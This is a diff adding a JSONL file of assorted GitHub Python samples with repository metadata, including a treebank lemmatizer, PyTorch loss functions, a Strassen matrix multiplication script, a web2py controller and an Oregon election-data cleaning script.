diff --git "a/2402.jsonl" "b/2402.jsonl" new file mode 100644--- /dev/null +++ "b/2402.jsonl" @@ -0,0 +1,1755 @@ +{"seq_id":"25112095949","text":"#!/usr/bin/python3\n#\n# ./extract filepattern output_directory\n# Example: ./dat2txt.py txt/\n#\nimport glob\nimport sys\nimport os\n\nimport re \n\ndef is_id( label ):\n # horrible, but works\n return len( label.split(\".\") ) == 4 and len( label.split(\",\") ) == 2 \n\n\ndef is_empty( label ):\n if len(label)==0:\n return True \n if label[0] == \"*\":\n return True\n if label[0] == \"0\":\n return True\n if label[0] == \"{\":\n return True\n if label[0] == \"<\":\n return True\n #if is_id(label):\n # return True\n \n return False\n\n\n#file = open(\"/home/anton/icecorpus/finished/11xx.firstgrammar.sci-lin.psd\")\n#lines = file.readlines()\n\ntagword = r\"\\(([^ \\t\\n\\r\\(\\)]+) ([^ \\t\\n\\r\\(\\)]+)\\)\"\n#allchars = 'a-zA-ZþæðöÞÆÐÖáéýúíóÁÉÝÚÍÓ\\-'\n#tagword = r'\\((['+allchars+']+) (['+allchars+']+)\\)'\n\nlemmata = {}\n\nprelemmatized = 0\nlemmatized = 0\nbad = 0\nremaining = 0\n\n\ndef extract_text( infile_path, output_directory, unknowns ):\n global prelemmatized\n global lemmatized\n global bad\n global remaining\n \n infile = open( infile_path, \"r\" )\n alltext = infile.read() \n output=\"\"\n trees = alltext.split(\"\\n\\n\")\n for tree in trees: \n lines = tree.split(\"\\n\")\n for line in lines: \n if re.search(tagword,line) != None:\n \n matches = re.findall( tagword, line )\n #print( matches )\n for match in matches:\n tag = match[0]\n word = match[1]\n lemma = \"0\" \n chunks = word.split(\"-\")\n if len(chunks) == 2:\n lemma = chunks[1]\n word = chunks[0]\n prelemmatized += 1\n elif len(chunks) == 1 and not is_empty( chunks[0] ) and not tag == \"CODE\":\n identity = word.lower()+\"_\"+tag \n if identity in lemmata.keys():\n line = line.replace(tag + \" \" + chunks[0], tag + \" \" + chunks[0]+\"-\"+lemmata[word.lower()+\"_\"+tag] )\n lemmatized += 1\n else:\n remaining += 1\n unknowns.append( chunks[0] + \"\\t\" + tag + \"\\t\" + chunks[0].replace(\"$\",\"\") )\n else:\n if not is_empty( chunks[0] ) and not tag == \"CODE\":\n print( word + \"-\" + tag + \"-\" +lemma)\n bad += 1 \n \n word = word.replace(\"\",\"-\")\n \n #if not is_empty( word ) and tag != \"ID\" and tag!=\"CODE\": \n # output += word + \"\\t\" + tag + \"\\t\" + lemma + \"\\n\" \n \n output += line + \"\\n\"\n output += \"\\n\"\n \n\n #output = output.replace(\"$ $\", \"\") \n basename = os.path.basename( infile_path ) \n basename = basename[0:-4] \n outfile = open( output_directory + basename + \".psd\", \"w\" ) \n outfile.write( output.strip() + \"\\n\\n\" )\n \n #for idx, value in enumerate(lemmata):\n # print( str(idx) + \"\\t\" + value + \" \"+ lemmata[value] )\n \n\n# get input params\nfile_matcher = sys.argv[1] # like something/*.dat\noutput_directory = sys.argv[2] # like data/\nlemmadict = sys.argv[3]\nunfile = sys.argv[4] # file to put unknowns\n\n# load lemmata\nlemmafile = open(lemmadict, \"r\")\nlines = lemmafile.readlines()\nfor line in lines:\n if ( len( line.split(\"\\t\") ) == 3 ):\n word, tag, lemma = line.split(\"\\t\")\n lemmata[ word.lower()+\"_\"+tag ] = lemma.lower().strip()\n\n# start correcting lemmata\nunknowns = []\nallfiles = glob.glob( file_matcher )\nfor file in allfiles:\n print( file )\n extract_text( file, output_directory, unknowns )\n\nprint(\"prelemmatized: \" +str(prelemmatized) )\nprint(\"lemmatized: \" +str(lemmatized) )\nprint(\"remaining: \" +str(remaining) )\nprint(\"bad: \" +str(bad) )\n\nunoutput = \"\"\nfor unknown in unknowns:\n unoutput += unknown + \"\\n\"\nopen(unfile,\"w\").write(unoutput)\n\nprint( \"done\" )\n","repo_name":"antonkarl/icecorpus","sub_path":"tscripts/src/lemmatizepsd.py","file_name":"lemmatizepsd.py","file_ext":"py","file_size_in_byte":4339,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"67"} +{"seq_id":"2769940346","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('workflow', '0017_auto_20151016_1551'),\n ('intake', '0002_typeformsubmission'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='TypeformAsset',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('asset_url', models.CharField(max_length=256, null=True, blank=True)),\n ('css_report', models.ForeignKey(to='workflow.CSSCall')),\n ],\n ),\n ]\n","repo_name":"codeforamerica/vallejo-css-toolkit","sub_path":"intake/migrations/0003_typeformasset.py","file_name":"0003_typeformasset.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"9416793233","text":"#!/usr/bin/python\nimport matplotlib.pyplot as plt\nplt.style.use('seaborn-whitegrid')\nimport matplotlib.animation as animation\nimport numpy as np\nimport csv\n\nfig = plt.figure()\nax = fig.add_subplot(1,1,1)\nfig.set_tight_layout(True)\naxes = plt.gca()\naxes.set_xlim([-70,70])\naxes.set_ylim([-70,70])\ndatafile = open('voronoi_3.csv', 'r')\nVorreader = csv.reader(datafile, delimiter=',')\n\ndef animate(i):\n for row in Vorreader:\n ax.clear()\n# ax.plot([-50, -50, 50, 50, -50],[-50, 50, 50, -50, -50],'b--')\n j = 1\n while j < len(row)-2:\n ax.plot([float(row[j]), float(row[j+2])], [float(row[j+1]), float(row[j+3])])\n j += 6\n ax.plot(float(row[len(row)-2]),float(row[len(row)-1]),'x')\n return\n\nani = animation.FuncAnimation(fig, animate, interval=250)\nani.save('Voronoi.gif', dpi=80, writer='imagemagick')\nplt.show()\n","repo_name":"ulrichdah/ROSBuzz-public","sub_path":"buzz_scripts/log/anim_voronoi_cells.py","file_name":"anim_voronoi_cells.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"13435464999","text":"from __future__ import print_function\n\nimport torch\nimport torch.nn as nn\n\n\nclass SupConLoss(nn.Module):\n \"\"\"Supervised Contrastive Learning: https://arxiv.org/pdf/2004.11362.pdf.\n It also supports the unsupervised contrastive loss in SimCLR\"\"\"\n def __init__(self, temperature=0.07, contrast_mode='all',\n base_temperature=1):\n super(SupConLoss, self).__init__()\n self.temperature = temperature\n self.contrast_mode = contrast_mode\n self.base_temperature = base_temperature\n\n def forward(self, features, labels=None, mask=None):\n \"\"\"Compute loss for model. If both `labels` and `mask` are None,\n it degenerates to SimCLR unsupervised loss:\n https://arxiv.org/pdf/2002.05709.pdf\n\n Args:\n features: hidden vector of shape [bsz, n_views, ...].\n labels: ground truth of shape [bsz].\n mask: contrastive mask of shape [bsz, bsz], mask_{i,j}=1 if sample j\n has the same class as sample i. Can be asymmetric.\n Returns:\n A loss scalar.\n \"\"\"\n device = (torch.device('cuda')\n if features.is_cuda\n else torch.device('cpu'))\n features=features.permute(2, 1, 0)\n if len(features.shape) < 3:\n raise ValueError('`features` needs to be [bsz, n_views, ...],'\n 'at least 3 dimensions are required')\n if len(features.shape) > 3:\n features = features.view(features.shape[0], features.shape[1], -1)\n\n batch_size = features.shape[0]\n if labels is not None and mask is not None:\n raise ValueError('Cannot define both `labels` and `mask`')\n elif labels is None and mask is None:\n mask = torch.eye(batch_size, dtype=torch.float32).to(device)\n elif labels is not None:\n labels = labels.contiguous().view(-1, 1)\n if labels.shape[0] != batch_size:\n raise ValueError('Num of labels does not match num of features')\n mask = torch.eq(labels, labels.T).float().to(device)\n else:\n mask = mask.float().to(device)\n\n contrast_count = features.shape[1]\n contrast_feature = torch.cat(torch.unbind(features, dim=1), dim=0)\n if self.contrast_mode == 'one':\n anchor_feature = features[:, 0]\n anchor_count = 1\n elif self.contrast_mode == 'all':\n anchor_feature = contrast_feature\n anchor_count = contrast_count\n else:\n raise ValueError('Unknown mode: {}'.format(self.contrast_mode))\n\n # compute logits\n anchor_dot_contrast = torch.div(\n torch.matmul(anchor_feature, contrast_feature.T),\n self.temperature)\n # for numerical stability\n logits_max, _ = torch.max(anchor_dot_contrast, dim=1, keepdim=True)\n logits = anchor_dot_contrast - logits_max.detach()\n\n # tile mask\n mask = mask.repeat(anchor_count, contrast_count)\n # mask-out self-contrast cases\n logits_mask = torch.scatter(\n torch.ones_like(mask),\n 1,\n torch.arange(batch_size * anchor_count).view(-1, 1).to(device),\n 0\n )\n mask = mask * logits_mask\n\n # compute log_prob\n exp_logits = torch.exp(logits) * logits_mask\n log_prob = logits - torch.log(exp_logits.sum(1, keepdim=True))\n\n # compute mean of log-likelihood over positive\n mean_log_prob_pos = (mask * log_prob).sum(1) / mask.sum(1)\n\n # loss\n loss = - (self.temperature / self.base_temperature) * mean_log_prob_pos\n loss = loss.view(anchor_count, batch_size).mean()\n\n return loss\nclass SinkhornDistance(nn.Module):\n r\"\"\"\n Given two empirical measures each with :math:`P_1` locations\n :math:`x\\in\\mathbb{R}^{D_1}` and :math:`P_2` locations :math:`y\\in\\mathbb{R}^{D_2}`,\n outputs an approximation of the regularized OT cost for point clouds.\n Args:\n eps (float): regularization coefficient\n max_iter (int): maximum number of Sinkhorn iterations\n reduction (string, optional): Specifies the reduction to apply to the output:\n 'none' | 'mean' | 'sum'. 'none': no reduction will be applied,\n 'mean': the sum of the output will be divided by the number of\n elements in the output, 'sum': the output will be summed. Default: 'none'\n Shape:\n - Input: :math:`(N, P_1, D_1)`, :math:`(N, P_2, D_2)`\n - Output: :math:`(N)` or :math:`()`, depending on `reduction`\n \"\"\"\n def __init__(self, eps, max_iter, reduction='none'):\n super(SinkhornDistance, self).__init__()\n self.eps = eps\n self.max_iter = max_iter\n self.reduction = reduction\n\n def forward(self, x, y):\n # The Sinkhorn algorithm takes as input three variables :\n C = self._cost_matrix(x, y) # Wasserstein cost function\n x_points = x.shape[-2]\n y_points = y.shape[-2]\n if x.dim() == 2:\n batch_size = 1\n else:\n batch_size = x.shape[0]\n\n # both marginals are fixed with equal weights\n mu = torch.empty(batch_size, x_points, dtype=torch.float,\n requires_grad=False).fill_(1.0 / x_points).squeeze().cuda()\n nu = torch.empty(batch_size, y_points, dtype=torch.float,\n requires_grad=False).fill_(1.0 / y_points).squeeze().cuda()\n u = torch.zeros_like(mu).cuda()\n v = torch.zeros_like(nu).cuda()\n # To check if algorithm terminates because of threshold\n # or max iterations reached\n actual_nits = 0\n # Stopping criterion\n thresh = 1e-1\n\n # Sinkhorn iterations\n for i in range(self.max_iter):\n u1 = u # useful to check the update\n u = self.eps * (torch.log(mu+1e-8) - torch.logsumexp(self.M(C, u, v), dim=-1)) + u\n v = self.eps * (torch.log(nu+1e-8) - torch.logsumexp(self.M(C, u, v).transpose(-2, -1), dim=-1)) + v\n err = (u - u1).abs().sum(-1).mean()\n\n actual_nits += 1\n if err.item() < thresh:\n break\n\n U, V = u, v\n # Transport plan pi = diag(a)*K*diag(b)\n pi = torch.exp(self.M(C, U, V))\n # Sinkhorn distance\n aa=pi * C\n #print(aa.shape)\n cost = torch.sum(aa, dim=(-2, -1))\n\n if self.reduction == 'mean':\n cost = cost.mean()\n elif self.reduction == 'sum':\n cost = cost.sum()\n\n return cost, pi, C\n\n def M(self, C, u, v):\n \"Modified cost for logarithmic updates\"\n \"$M_{ij} = (-c_{ij} + u_i + v_j) / \\epsilon$\"\n #print(C.get_device(),u.get_device(),v.get_device())\n return (-C + u.unsqueeze(-1) + v.unsqueeze(-2)) / self.eps\n\n @staticmethod\n def _cost_matrix(x, y, p=2):\n \"Returns the matrix of $|x_i-y_j|^p$.\"\n x_col = x.unsqueeze(-2)\n y_lin = y.unsqueeze(-3)\n C = torch.sum((torch.abs(x_col - y_lin)) ** p, -1)\n return C\n\n @staticmethod\n def ave(u, u1, tau):\n \"Barycenter subroutine, used by kinetic acceleration through extrapolation.\"\n return tau * u + (1 - tau) * u1","repo_name":"tsbiosky/PointACL","sub_path":"BYOL/util/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":7243,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"38136849922","text":"import torch\nfrom torch.nn.modules import Module\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom models import base_model\n\nclass LeNetBN(base_model.HookModule):\n def __init__(self, device, name, num_classes=10):\n super(LeNetBN, self).__init__(device, name)\n self.features = nn.Sequential(\n nn.Conv2d(1, 64, kernel_size=3, stride=1, padding=1),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n nn.Conv2d(64, 64, kernel_size=3, stride=1, padding=1),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=1, stride=2),\n )\n\n self.flatten = nn.Flatten(start_dim=1)\n\n self.classifier = nn.Sequential(\n nn.Linear(64*14*14, 256),\n nn.ReLU(inplace=True),\n nn.Linear(256, 256),\n nn.ReLU(inplace=True),\n nn.Linear(256, num_classes)\n )\n\n def forward(self, x):\n out = self.features(x)\n out = self.flatten(out)\n out = self.classifier(out)\n return out\n\ndef build_lenetbn(device):\n return LeNetBN(device, 'lenetbn').to(device)\n","repo_name":"qzhong0605/pytorch_lottery","sub_path":"models/mnist/lenetbn.py","file_name":"lenetbn.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"7325164904","text":"if '__file__' in globals(): # __file__ 이라는 전역 변수가 정의되어 있는지 확인\n import os, sys\n sys.path.append(os.path.join(os.path.dirname(__file__), '..')) # 현재 파일이 위치한 디렉터리의 부모 디렉터리를 모듈 검색 경로에 추가\n # -> 이로써 파이썬 명령어를 어디에서 실행하든 dezero_DJ 디렉토리의 파일들은 제대로 import할 수 있게 됨\n # 이건 현재 개발 중인 dezero_DJ 디렉토리를 import 하기위해 임시로 사용\n # Dezero가 패키지로 설치된 경우라면 DeZero패키지가 파이썬 검색 경로에 추가 => 그러면 이렇게 수동으로 할 필요없음\n # 다만 colab같은 환경때문에 사용중\n\n\nimport numpy as np\nfrom dezero_DJ import Variable\n\nx = Variable(np.array(1.0))\ny = (x + 3) ** 2\ny.backward()\nprint(y)\nprint(x.grad)\n\n\"\"\"\nvariable(16.0)\n8.0\n\"\"\"","repo_name":"absf123/baseOfDeeplearning_3","sub_path":"Step2/step23.py","file_name":"step23.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"27578306782","text":"\"\"\"URL mapping for core module.\"\"\"\n\n__author__ = \"Arkadii Yakovets (arcadiy@google.com)\"\n\nfrom core import views\nfrom django.conf.urls import url\n\n\nurlpatterns = [\n url(r\"^$\", views.IndexView.as_view()),\n url(r\"^feed.(?P(html|xml))$\", views.FeedView.as_view(),\n name=\"feed\"),\n url(r\"^feed/(?P.*).(?P(html|xml))$\",\n views.FeedView.as_view(), name=\"alert\"),\n url(r\"^post/$\", views.PostView.as_view(), name=\"post\"),\n url(r\"^template/(?P(area|message))/$\",\n views.AlertTemplateView.as_view(), name=\"template\"),\n url(r\"^preview/polygons$\",\n views.GeocodePolygonPreviewView.as_view(),\n name=\"geocodepreviewpolygons\"),\n]\n\n","repo_name":"CAPTools/CAPCollector","sub_path":"core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"67"} +{"seq_id":"17459045948","text":"# -*- coding: utf-8 -*-\n# try something like\n@auth.requires_login()\ndef index():\n pagina=request.args(0) or 1\n grupoventa=request.args(1) or None\n \n if pagina <1:\n pagina=1\n \n if grupoventa:\n busqueda = db.tbl_usrventas.idgrpventa==grupoventa\n paginador, rangoinicio, rangofin =fun_paginador(pagina, busqueda)\n formulario=db(busqueda).select(limitby=(rangoinicio, rangofin))\n else:\n idventas =db(db.auth_group.role==\"Vendedores\").select(db.auth_group.id).first()\n busqueda=db.auth_membership.group_id==idventas.id\n paginador, rangoinicio, rangofin =fun_paginador(pagina, busqueda)\n formulario=db(db.auth_membership.group_id==idventas.id).select(limitby=(rangoinicio, rangofin))\n\n return dict(formulario=formulario,paginador=paginador,grupoventa=grupoventa)\n\n@auth.requires_login()\ndef grupoventas():\n formulario= db(db.tbl_grupoventas).select()\n return dict(formulario=formulario)\n\n\n\n\ndef fun_paginador(idpagina,busqueda):\n maxlinea=10\n idpagina=int(idpagina)\n cantidad= db(busqueda).count()\n lineaspags=cantidad / maxlinea\n paghtml=UL(_class=\"pagination\")\n if idpagina >1:\n paghtml.append(LI(A(XML(''), _href=URL('index',args=idpagina-1))))\n\n \n\n if lineaspags>maxlinea:\n rangofin=idpagina + maxlinea\n else:\n rangofin=lineaspags\n\n for pag in range(idpagina, rangofin):\n paghtml.append (LI(A(pag, _href=URL('index',args=pag))) )\n\n paghtml.append(LI(A(XML(''), _href=URL('index',args=rangofin))))\n rangoinicio=(idpagina -1) * maxlinea\n rangofin=rangoinicio + maxlinea\n return paghtml,rangoinicio,rangofin\n","repo_name":"calimacaco/redox","sub_path":"controllers/vendedores.py","file_name":"vendedores.py","file_ext":"py","file_size_in_byte":1796,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"6717854433","text":"import numpy as np\n\n\nnum_addorsub=0\nnum_mul=0\nnum_assign=0\n\ndef matrix_add(matrix_a, matrix_b):\n '''\n :param matrix_a:\n :param matrix_b:\n :return:matrix_c=matrix_a+matrix_b\n '''\n rows = len(matrix_a) # get numbers of rows\n columns = len(matrix_a[0]) # get numbers of cols\n matrix_c = [list() for i in range(rows)] # build matrix 2d list\n for i in range(rows):\n for j in range(columns):\n matrix_c_temp = matrix_a[i][j] + matrix_b[i][j]\n global num_addorsub,num_assign\n num_addorsub=num_addorsub+1\n num_assign = num_assign+1\n matrix_c[i].append(matrix_c_temp)\n return matrix_c\n\n\ndef matrix_minus(matrix_a, matrix_b):\n '''\n :param matrix_a:\n :param matrix_b:\n :return:matrix_c=matrix_a-matrix_b\n '''\n rows = len(matrix_a)\n columns = len(matrix_a[0])\n matrix_c = [list() for i in range(rows)]\n for i in range(rows):\n for j in range(columns):\n matrix_c_temp = matrix_a[i][j] - matrix_b[i][j]\n global num_addorsub,num_assign\n num_addorsub = num_addorsub + 1\n num_assign=num_assign+1\n matrix_c[i].append(matrix_c_temp)\n return matrix_c\n\n\ndef matrix_divide(matrix_a, row, column):\n '''\n :param matrix_a:\n :param row:\n :param column:\n :return: matrix_b=matrix_a(row,column) to divide matrix_a\n '''\n length = len(matrix_a)\n matrix_b = [list() for i in range(length // 2)]\n k = 0\n for i in range((row - 1) * length // 2, row * length // 2):\n for j in range((column - 1) * length // 2, column * length // 2):\n matrix_c_temp = matrix_a[i][j]\n matrix_b[k].append(matrix_c_temp)\n k += 1\n return matrix_b\n\n\ndef matrix_merge(matrix_11, matrix_12, matrix_21, matrix_22):\n '''\n :param matrix_11:\n :param matrix_12:\n :param matrix_21:\n :param matrix_22:\n :return:mariix merged by 4 parts above\n '''\n length = len(matrix_11)\n matrix_all = [list() for i in range(length * 2)] # build a matrix of double rows\n for i in range(length):\n # for each row. matrix_all list contain row of matrix_11 and matrix_12\n matrix_all[i] = matrix_11[i] + matrix_12[i]\n for j in range(length):\n # for each row. matrix_all list contain row of matrix_21 and matrix_22\n matrix_all[length + j] = matrix_21[j] + matrix_22[j]\n return matrix_all\n\n\ndef strassen(matrix_a, matrix_b):\n '''\n :param matrix_a:\n :param matrix_b:\n :return:matrix_a * matrix_b\n '''\n rows = len(matrix_a)\n if rows == 1:\n matrix_all = [list() for i in range(rows)]\n matrix_all[0].append(matrix_a[0][0] * matrix_b[0][0])\n elif(rows % 2 ==1): #不能被2整除无法用 strassen,一直递归到无法被2整除,或者只剩一个元素(如上面),就用NumPy做正常的MatMul\n # 但实际用的时候应该分解到能较快计算矩阵时,矩阵能更好的利用硬件时,就可以停止,或者可以搜索得到应该停止的规模,而不一定非得是奇数或1,这又和原矩阵的形状相关的,看最终矩阵取什么值可以更少地乘2^k次方得到原矩阵\n \"\"\" 正常MatMul如下:\n C11 = A11 • B11 + A12 • B21\n C12 = A11 • B12 + A12 • B22\n C21= A21 • B11 + A22 • B21\n C22 = A21 • B12 + A22 • B22 \n \"\"\"\n matrix_a_np = np.array(matrix_a)\n matrix_b_np = np.array(matrix_b)\n matrix_all = np.dot(matrix_a_np,matrix_b_np)\n global num_mul,num_addorsub\n num_mul = num_mul + 27\n num_addorsub=num_addorsub + 18\n else:\n # 10 first parts of computing. 由于不涉及乘法,可以直接计算\n # S1 = B12 - B22\n # S2 = A11 + A12\n # S3 = A21 + A22\n # S4 = B21 - B11\n # S5 = A11 + A22\n # S6 = B11 + B22\n # S7 = A12 - A22\n # S8 = B21 + B22\n # S9 = A11 - A21\n # S10 = B11 + B12\n s1 = matrix_minus((matrix_divide(matrix_b, 1, 2)), (matrix_divide(matrix_b, 2, 2)))\n s2 = matrix_add((matrix_divide(matrix_a, 1, 1)), (matrix_divide(matrix_a, 1, 2)))\n s3 = matrix_add((matrix_divide(matrix_a, 2, 1)), (matrix_divide(matrix_a, 2, 2)))\n s4 = matrix_minus((matrix_divide(matrix_b, 2, 1)), (matrix_divide(matrix_b, 1, 1)))\n s5 = matrix_add((matrix_divide(matrix_a, 1, 1)), (matrix_divide(matrix_a, 2, 2)))\n s6 = matrix_add((matrix_divide(matrix_b, 1, 1)), (matrix_divide(matrix_b, 2, 2)))\n s7 = matrix_minus((matrix_divide(matrix_a, 1, 2)), (matrix_divide(matrix_a, 2, 2)))\n s8 = matrix_add((matrix_divide(matrix_b, 2, 1)), (matrix_divide(matrix_b, 2, 2)))\n s9 = matrix_minus((matrix_divide(matrix_a, 1, 1)), (matrix_divide(matrix_a, 2, 1)))\n s10 = matrix_add((matrix_divide(matrix_b, 1, 1)), (matrix_divide(matrix_b, 1, 2)))\n # 7 second parts of computing. 由于涉及乘法,而S系列又是在上面直接计算得到,所以A和B系列需要递归用strassen计算. log_2(7) 就是由P系列的递归计算而来\n # P1 = A11 • S1\n # P2 = S2 • B22\n # P3 = S3 • B11\n # P4 = A22 • S4\n # P5 = S5 • S6\n # P6 = S7 • S8\n # P7 = S9 • S10\n p1 = strassen(matrix_divide(matrix_a, 1, 1), s1)\n p2 = strassen(s2, matrix_divide(matrix_b, 2, 2))\n p3 = strassen(s3, matrix_divide(matrix_b, 1, 1))\n p4 = strassen(matrix_divide(matrix_a, 2, 2), s4)\n p5 = strassen(s5, s6)\n p6 = strassen(s7, s8)\n p7 = strassen(s9, s10)\n # 4 final parts of result\n # C11 = P5 + P4 - P2 + P6\n # C12 = P1 + P2\n # C21 = P3 + P4\n # C22 = P5 + P1 - P3 - P7\n c11 = matrix_add(matrix_add(p5, p4), matrix_minus(p6, p2))\n c12 = matrix_add(p1, p2)\n c21 = matrix_add(p3, p4)\n c22 = matrix_minus(matrix_add(p5, p1), matrix_add(p3, p7))\n matrix_all = matrix_merge(c11, c12, c21, c22)\n global num_assign\n num_assign =num_assign+22\n return matrix_all\n\n\ndef main():\n # read data\n # A = read_matrix('matrixA.txt')\n # B = read_matrix('matrixB.txt')\n \n A_arr = np.random.rand(6, 6)\n B_arr = np.random.rand(6, 6)\n print(\"Rand Matrix A:\")\n print(A_arr)\n print(\"Rand Matrix B:\")\n print(B_arr)\n A = A_arr.tolist()\n B = B_arr.tolist()\n\n # compute A*B\n C = strassen(A,B)\n print(\"\\nResult of matrix given\\n\",np.array(C))\n\n # verificate A*B\n C_verification=np.dot(A,B)\n print(\"\\n Result of NumPy:\")\n print(C_verification)\n print(\"\\nSubtract from standard results\\n\",np.array((C-C_verification),dtype=int))\n\n # statistical data\n print(\"\\nfrequency of add/sub\",num_addorsub)\n print(\"frequency of assign\", num_assign)\n print(\"frequency of mul\", num_mul)\n \n # 下面是整数矩阵\n # new_matrixA = np.random.random_integers(-5,5,size=(8, 8))\n # print(\"\\nRandom Matrix A:\\n\", new_matrixA)\n # new_matrixB = np.random.random_integers(-5,5,size=(8, 8))\n # print(\"\\nRandom Matrix B:\\n\", new_matrixB)\n\n # AdotB=strassen(new_matrixA, new_matrixB)\n # print(\"\\n A*B Result of matrixs by generate randomly\\n\",np.array(AdotB))\n\n # BdotA = strassen(new_matrixB, new_matrixA)\n # print(\"\\n B*A Result of matrixs by generate randomly\\n\", np.array(BdotA))\n\n # result=new_matrixA\n # for i in range(0,2019):\n # result=strassen(result,new_matrixA)\n # print(\"\\n A^2019 Result of matrixs by generate randomly\\n\",np.array(result))\nif __name__ == '__main__':\n main()","repo_name":"butterluo/langAlg","sub_path":"py/strassen.py","file_name":"strassen.py","file_ext":"py","file_size_in_byte":7539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"29345015253","text":"from typing import List\n\n\nclass Solution:\n def search(self, nums: List[int], target: int) -> int:\n\n def searchHelper( low, high) -> int:\n i = low\n j = high\n if i <= j:\n\n m = (i + j) // 2\n if nums[m] == target:\n return m\n if nums[m] < target:\n return searchHelper(m + 1, high)\n else:\n return searchHelper(low, m - 1)\n return -1\n\n return searchHelper(0, len(nums)-1)\n\n def search2(self, nums: List[int], target: int) -> int:\n left, right = 0, len(nums) - 1\n while left <= right:\n pivot = left + (right - left) // 2\n if nums[pivot] == target:\n return pivot\n if target < nums[pivot]:\n right = pivot - 1\n else:\n left = pivot + 1\n return -1\n\nif __name__ == '__main__':\n print(Solution().search([-1,0,3,5,9,12], 13))\n","repo_name":"replcloud/interview_py","sub_path":"us/matthey/coco/algorithm/leetcode/binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"40606622378","text":"'''\n 请实现有重复数字的升序数组的二分查找。\n 输出在数组中第一个大于等于查找值的位置,如果数组中不存在这样的数,则输出数组长度加一\n\ninput 4,[1,2,4,4,5]\noutput 3\n'''\n\ndef upper_bound(nums,target):\n\tn=len(nums)\n\tl,r=0,n-1\n\twhile l<=r:\n\t\tmid=(l+r)//2\n\t\tif nums[mid] 1:\n print(x)\n print(lst)'''\n\n\n# In[9]:\n\n\ndf.loc[df['candidate'] == 'MARK R ROBERTS', 'party_detailed'] = 'INDEPENDENT PARTY OF OREGON'\ndf.loc[df['candidate'] == 'MARK R ROBERTS', 'party_simplified'] = 'OTHER'\n\ndf.loc[df['candidate'] == 'NICK CHEN', 'party_detailed'] = 'LIBERTARIAN'\ndf.loc[df['candidate'] == 'NICK CHEN', 'party_simplified'] = 'OTHER'\n\ndf.loc[df['candidate'] == 'PATRICK STARNES', 'party_detailed'] = 'DEMOCRAT'\ndf.loc[df['candidate'] == 'PATRICK STARNES', 'party_simplified'] = 'DEMOCRAT'\n\ndf.loc[df['candidate'] == 'RICHARD R JACOBSON', 'party_detailed'] = 'LIBERTARIAN'\ndf.loc[df['candidate'] == 'RICHARD R JACOBSON', 'party_simplified'] = 'OTHER'\n\ndf.loc[df['candidate'] == 'DAN SOUZA', 'party_detailed'] = 'LIBERTARIAN'\ndf.loc[df['candidate'] == 'DAN SOUZA', 'party_simplified'] = 'OTHER'\n\ndf.loc[df['candidate'] == 'MARK KARNOWSKI', 'party_detailed'] = 'LIBERTARIAN'\ndf.loc[df['candidate'] == 'MARK KARNOWSKI', 'party_simplified'] = 'OTHER'\n\ndf.loc[df['candidate'] == 'CYNTHIA HYATT', 'party_detailed'] = 'INDEPENDENT PARTY OF OREGON'\ndf.loc[df['candidate'] == 'CYNTHIA HYATT', 'party_simplified'] = 'OTHER'\n\ndf.loc[df['candidate'] == 'GARY LYNDON DYE', 'party_detailed'] = 'LIBERTARIAN'\ndf.loc[df['candidate'] == 'GARY LYNDON DYE', 'party_simplified'] = 'OTHER'\n\ndf.loc[df['candidate'] == 'MARC W KOLLER', 'party_detailed'] = 'INDEPENDENT PARTY OF OREGON'\ndf.loc[df['candidate'] == 'MARC W KOLLER', 'party_simplified'] = 'OTHER'\n\ndf.loc[df['candidate'] == 'KENNY SERNACH', 'party_detailed'] = 'LIBERTARIAN'\ndf.loc[df['candidate'] == 'KENNY SERNACH', 'party_simplified'] = 'OTHER'\n\ndf.loc[df['candidate'] == 'TIM E NELSON', 'party_detailed'] = 'LIBERTARIAN'\ndf.loc[df['candidate'] == 'TIM E NELSON', 'party_simplified'] = 'OTHER'\n\ndf.loc[df['candidate'] == 'BRIAN P HALVORSEN', 'party_detailed'] = 'INDEPENDENT PARTY OF OREGON'\ndf.loc[df['candidate'] == 'BRIAN P HALVORSEN', 'party_simplified'] = 'OTHER'\n\ndf.loc[df['candidate'] == 'FRANK L LENGELE JR ', 'party_detailed'] = 'LIBERTARIAN'\ndf.loc[df['candidate'] == 'FRANK L LENGELE JR ', 'party_simplified'] = 'OTHER'\n\ndf.loc[df['candidate'] == 'SKYE FARNAM', 'party_detailed'] = 'INDEPENDENT PARTY OF OREGON'\ndf.loc[df['candidate'] == 'SKYE FARNAM', 'party_simplified'] = 'OTHER'\n\n\n# In[10]:\n\n\ndef district(x):\n if x == '':\n return '' \n if x == 'STATEWIDE':\n return x\n else:\n return x.zfill(3)\ndf['district'] = df['district'].apply(district)\n\n# drop total votes\ndf = df[~(df['office']==\"\")].copy()\n# drop duplicates and double counting\ndf = df.drop_duplicates()\ndf = df[~(df['precinct'].isin(['CLACKAMAS OR', 'COOS OR', 'CROOK OR', 'GRANT 